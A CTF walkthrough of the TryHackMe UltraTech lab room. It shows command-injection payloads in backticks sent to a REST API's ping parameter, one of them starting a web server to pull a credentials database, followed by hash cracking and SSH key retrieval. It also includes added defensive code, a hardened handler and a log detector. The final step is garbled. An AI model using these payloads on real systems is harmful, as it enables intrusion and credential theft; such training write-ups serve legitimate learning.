UltraTech walkthrough on TryHackMe

 The UltraTech room on TryHackMe is a cybersecurity training environment designed to teach and test various skills related to penetration testing, network exploitation, and vulnerability assessment. Here’s a breakdown of what you might encounter in the UltraTech room:



Overview

  • Objective: Gain unauthorized access to the UltraTech network, identify vulnerabilities, exploit them, and capture specific flags as proof of your achievements.
  • Difficulty Level: The difficulty can range from beginner to intermediate, depending on the specific tasks and challenges set within the room.

Key Concepts and Skills

  • Network Scanning: Use tools like Nmap to discover active devices, open ports, and running services within the UltraTech network.
  • Enumeration: Gather detailed information about the identified services and devices to find potential vulnerabilities.
  • Exploitation: Use known vulnerabilities or craft exploits to gain access to systems. This could involve web application attacks, password cracking, or exploiting network services.
  • Privilege Escalation: Once access is gained, escalate privileges to gain more control over the compromised system. This might include exploiting kernel vulnerabilities, misconfigurations, or weak file permissions.
  • Post-Exploitation: Conduct actions such as maintaining access, covering tracks, or extracting sensitive information once higher privileges are obtained.

Common Tools and Techniques

  • Reconnaissance: Nmap, Netcat, Nikto, Dirbuster.
  • Exploitation: Metasploit, manual exploitation scripts, SQL injection, Cross-Site Scripting (XSS).
  • Privilege Escalation: LinPEAS, WinPEAS, manual enumeration, exploiting SUID files, kernel exploits.
  • Post-Exploitation: Mimikatz, PowerShell scripts, data exfiltration tools.

Flags

  • User Flags: Indicate successful access to user-level accounts on the compromised machines.
  • Root/Admin Flags: Indicate successful privilege escalation to the highest level of access on the machine.

Learning Outcomes

  • Develop a comprehensive approach to penetration testing, including reconnaissance, exploitation, and post-exploitation.
  • Gain hands-on experience with popular tools and techniques used by penetration testers and ethical hackers.
  • Understand the importance of detailed enumeration and the common vulnerabilities found in real-world systems.
  • Learn strategies for escalating privileges and maintaining access in a compromised network.

The UltraTech room provides a realistic and challenging environment to practice and hone your cybersecurity skills, making it an excellent resource for both beginners and those looking to advance their knowledge in the field.

Let's start solving this room

1.) Deploy the machine


2.) Run the nmap scan

Command - nmap -sC -sV -T4 <IP>


Now you can answer these questions by looking at the nmap scan


The software using the port 8081 is a REST api, how many of its routes are used by the web application? - To answer this question we have to run a gobuster scan on port 8081




Examine the website on port 31331



Check the robots.txt file; there you will find the sitemap of the website, /utech_sitemap.txt


Open /utech_sitemap.txt

It lists these paths:

/

/index.html

/what.html

/partners.html


3.) Open up Burp Suite and then open /partners.html


Click on the /ping?ip=10.10.191.119 request and then send it to Repeater


Edit the request

GET /ping?ip=`id` HTTP/1.1
Host: 10.10.191.119:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://10.10.191.119:31331
Connection: close
Referer: http://10.10.191.119:31331/
If-None-Match: W/"10b-4dgJl7lwc/A/bgU7Q6fF0qNyH84"
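The backtick payload above only works if the API pastes the ip value into a shell command line. The following is an added example, not code from the room or from this walkthrough, showing the server-side fix in Python: accept only an IPv4 literal and run ping from an argument list with no shell. The function names, the ping options and the string-built "before" form are assumptions made for illustration.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs


def vulnerable_command(query_string):
    """Assumed 'before' form: the parameter is pasted into a shell string,
    so backticks in it are expanded by the shell before ping ever runs."""
    ip = parse_qs(query_string).get("ip", [""])[0]
    return f"ping -c 1 {ip}"  # would be handed to a shell (shell=True)


def handle_ping(query_string, runner=subprocess.run):
    """Hardened form: strict validation, argument list, no shell.

    Returns (status_code, body). `runner` is injectable (hypothetical
    parameter) so the handler can be exercised without sending ICMP.
    """
    values = parse_qs(query_string).get("ip", [])
    if len(values) != 1:
        return 400, "exactly one ip parameter is required"
    try:
        # IPv4 literal only. IPv6Address is avoided on purpose because it
        # also accepts a '%zone' suffix after the address.
        addr = ipaddress.IPv4Address(values[0])
    except ValueError:
        return 400, "ip must be an IPv4 literal"
    # str(addr) is the parsed, canonical form rather than the raw input,
    # and each list element reaches ping as exactly one argument.
    argv = ["ping", "-c", "1", str(addr)]
    result = runner(argv, shell=False, capture_output=True, text=True, timeout=5)
    return 200, result.stdout
```

Both requests shown in this step are answered with 400 by handle_ping and never reach the process runner.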



Edit the request again, this time with python3 -m http.server 8090, then apply URL decoding (using Ctrl+U)

GET /ping?ip=`python3+-m+http.server+8090` HTTP/1.1
Host: 10.10.191.119:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://10.10.191.119:31331
Connection: close
Referer: http://10.10.191.119:31331/
If-None-Match: W/"10b-4dgJl7lwc/A/bgU7Q6fF0qNyH84"
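Requests like the two above stand out in an access log, because a ping target should never be anything but an address. The following is an added example, not part of the original walkthrough, of a log check in Python that flags /ping requests whose ip value is not a plain IPv4 literal. The log format (common log format), the sample lines and the function names are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in common log format (not taken from the room).
SAMPLE_LOG = [
    '10.9.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?ip=10.10.191.119 HTTP/1.1" 200 267',
    '10.9.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /ping?ip=`id` HTTP/1.1" 200 49',
    '10.9.0.5 - - [01/Jan/2024:10:00:30 +0000] "GET /ping?ip=%60python3+-m+http.server+8090%60 HTTP/1.1" 200 0',
    '10.9.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 39',
]

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SHELL_META = set("`$;|&<>(){}\n\\'\"")


def is_ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def suspicious_ping_requests(lines, route="/ping", param="ip"):
    """Return (client, decoded_value, reason) for each request to `route`
    whose `param` is not a plain IPv4 literal."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != route:
            continue
        # parse_qs percent-decodes, so %60 and a raw backtick look the same.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_ipv4(value):
                continue
            meta = sorted(SHELL_META.intersection(value))
            reason = "shell metacharacters: " + " ".join(meta) if meta else "not an IPv4 literal"
            findings.append((client, value, reason))
    return findings
```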




Open Firefox, then visit the web server at <IP>:8090 and download utech.db.sqlite

Open up utech.db.sqlite


Copy the hashes of admin and root

Visit https://crackstation.net/ to crack the hash


Now you can solve Task 3


Task 4

Connect to the ssh server


Enter the command docker logs unruffled_shockley, then copy and paste the first 0 character of the private SSH key


THE END


Thank you for reading the walkthrough of the UltraTech room

HAPPY HACKING!
